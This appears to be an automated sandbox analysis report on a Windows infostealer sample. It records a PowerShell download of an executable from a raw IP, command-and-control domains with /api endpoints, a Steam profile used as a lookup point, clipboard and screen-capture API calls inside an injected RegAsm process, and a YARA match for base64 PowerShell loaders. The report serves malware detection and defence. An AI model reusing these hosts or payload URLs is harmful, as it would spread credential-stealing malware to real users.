Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /files/gqgqg.exe HTTP/1.1Host: 147.45.44.131Connection: Keep-Alive

Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.yu equals www.youtube.com (Youtube)
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.yu equals www.youtube.com (Youtube)
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tps://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: ptramidermsnqj.shop
Source: global traffic	DNS traffic detected: DNS query: gutterydhowi.shop
Source: global traffic	DNS traffic detected: DNS query: ghostreedmnu.shop
Source: global traffic	DNS traffic detected: DNS query: offensivedzvju.shop
Source: global traffic	DNS traffic detected: DNS query: vozmeatillu.shop
Source: global traffic	DNS traffic detected: DNS query: drawzhotdog.shop
Source: global traffic	DNS traffic detected: DNS query: fragnantbui.shop
Source: global traffic	DNS traffic detected: DNS query: stogeneratmns.shop
Source: global traffic	DNS traffic detected: DNS query: reinforcenh.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: ballotnwu.site
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ptramidermsnqj.shop

Source: file.exe	String found in binary or memory: http://.css
Source: file.exe	String found in binary or memory: http://.jpg
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 00000001.00000002.1735747000.00000000048F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131
Source: powershell.exe, 00000001.00000002.1735747000.000000000479F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/files/gqgqg.exe
Source: powershell.exe, 00000001.00000002.1741341041.0000000007079000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: file.exe	String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1735747000.000000000479F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1735747000.0000000004641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1735747000.000000000479F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: file.exe	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: file.exe	String found in binary or memory: https://aka.ms/binaryformatter
Source: file.exe	String found in binary or memory: https://aka.ms/dotnet-core-applaunch?Path:
Source: file.exe	String found in binary or memory: https://aka.ms/dotnet-core-applaunch?openGetWindowsDirectory
Source: file.exe	String found in binary or memory: https://aka.ms/dotnet-illink/com
Source: file.exe	String found in binary or memory: https://aka.ms/dotnet-illink/com)
Source: file.exe	String found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: file.exe	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: file.exe	String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: file.exe	String found in binary or memory: https://aka.ms/dotnet/download
Source: file.exe	String found in binary or memory: https://aka.ms/dotnet/infopath-to-application:Usage:
Source: file.exe	String found in binary or memory: https://aka.ms/dotnet/sdk-not-foundInstall
Source: file.exe	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000001.00000002.1735747000.0000000004641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/api
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/apiA
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/apiQ
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fragnantbui.shop/api
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ghostreedmnu.shop/apiB
Source: powershell.exe, 00000001.00000002.1735747000.000000000479F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: file.exe	String found in binary or memory: https://github.com/dotnet/runtime
Source: powershell.exe, 00000001.00000002.1735747000.0000000004F58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: powershell.exe, 00000001.00000002.1738535388.00000000056A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offensivedzvju.shop/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: RegAsm.exe, 00000005.00000002.1851549832.0000000000EBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ptramidermsnqj.shop/api
Source: RegAsm.exe, 00000005.00000002.1851549832.0000000000EBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ptramidermsnqj.shop/llh
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reinforcenh.shop/api
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.yu
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000005.00000002.1851549832.0000000000ED5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/y
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stogeneratmns.shop/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stogeneratmns.shop/api
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vozmeatillu.shop/api
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.21.83.105:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.136:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.13:443 -> 192.168.2.4:49741 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_004380A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_004380A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_004380A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_004380A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_00438220 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

5_2_00438220

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 7036, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

.NET source code contains very large strings

Source: 1.2.powershell.exe.8110000.5.raw.unpack, Program.cs	Long String: Length: 478552
Source: 1.2.powershell.exe.8110000.5.raw.unpack, SWFT.cs	Long String: Length: 18780
Source: 1.2.powershell.exe.59ac4a8.3.raw.unpack, Program.cs	Long String: Length: 478552
Source: 1.2.powershell.exe.59ac4a8.3.raw.unpack, SWFT.cs	Long String: Length: 18780

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00713220	0_2_00713220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B3200	0_2_009B3200
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008278C0	0_2_008278C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009AEA80	0_2_009AEA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B75BF0	0_2_00B75BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007EDCE0	0_2_007EDCE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009210C0	0_2_009210C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00781020	0_2_00781020
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007F1260	0_2_007F1260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007FF2D0	0_2_007FF2D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00832250	0_2_00832250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008BE3A0	0_2_008BE3A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A32330	0_2_00A32330
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A2A370	0_2_00A2A370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007DB390	0_2_007DB390
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A284C0	0_2_00A284C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008DB420	0_2_008DB420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007F6480	0_2_007F6480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C07580	0_2_00C07580
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A215E0	0_2_00A215E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C10570	0_2_00C10570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007B66F0	0_2_007B66F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007E96C0	0_2_007E96C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007596A0	0_2_007596A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A347F0	0_2_00A347F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A338B0	0_2_00A338B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D6850	0_2_007D6850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D7A00	0_2_009D7A00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A34A60	0_2_00A34A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007E9A80	0_2_007E9A80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009EEBC0	0_2_009EEBC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00733C60	0_2_00733C60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C2C30	0_2_008C2C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A34D80	0_2_00A34D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A18D90	0_2_00A18D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007D0E60	0_2_007D0E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A2CEF0	0_2_00A2CEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A21E20	0_2_00A21E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007BAF70	0_2_007BAF70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A23FE0	0_2_00A23FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00770F00	0_2_00770F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A79F30	0_2_00A79F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B77F00	0_2_00B77F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_05449D8B	0_2_05449D8B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_05445911	0_2_05445911
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041050F	5_2_0041050F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00446F0B	5_2_00446F0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00449040	5_2_00449040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042C070	5_2_0042C070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00401000	5_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004111F0	5_2_004111F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040A240	5_2_0040A240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040B250	5_2_0040B250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00405270	5_2_00405270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043E220	5_2_0043E220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004072A0	5_2_004072A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004012A9	5_2_004012A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00449310	5_2_00449310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00436330	5_2_00436330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004273E9	5_2_004273E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00448390	5_2_00448390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042D4EC	5_2_0042D4EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0044A4F0	5_2_0044A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041E576	5_2_0041E576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004276FE	5_2_004276FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004036B0	5_2_004036B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040979B	5_2_0040979B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004138C6	5_2_004138C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004309E0	5_2_004309E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00410A80	5_2_00410A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00429A85	5_2_00429A85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00437C40	5_2_00437C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042BC00	5_2_0042BC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00448C00	5_2_00448C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00407CA0	5_2_00407CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040BD60	5_2_0040BD60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040ADC0	5_2_0040ADC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00431DF0	5_2_00431DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042CE40	5_2_0042CE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00447E60	5_2_00447E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00443E80	5_2_00443E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043EF7E	5_2_0043EF7E

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00832250 appears 55 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040C850 appears 49 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040EA00 appears 152 times

Source: file.exe

Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Source: file.exe	Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.1710131079.00000000088E0000.00000002.00000001.00040000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710131079.00000000088E0000.00000002.00000001.00040000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.IO.MemoryMappedFiles.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710131079.00000000088E0000.00000002.00000001.00040000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.ObjectModel.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710131079.00000000088E0000.00000002.00000001.00040000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamemscordaccore.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIncrease.dll2 vs file.exe
Source: file.exe, 00000000.00000002.1710381249.00000000090B0000.00000002.00000001.00040000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.ComponentModel.TypeConverter.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710381249.00000000090B0000.00000002.00000001.00040000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710402115.00000000090D0000.00000002.00000001.00040000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710402115.00000000090D0000.00000002.00000001.00040000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.Collections.Immutable.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710402115.00000000090DB000.00000002.00000001.00040000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710402115.00000000090DB000.00000002.00000001.00040000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs file.exe
Source: file.exe, 00000000.00000002.1710639031.0000000009270000.00000002.00000001.00040000.00000003.sdmp	Binary or memory string: OriginalFilenameIncrease.dll2 vs file.exe
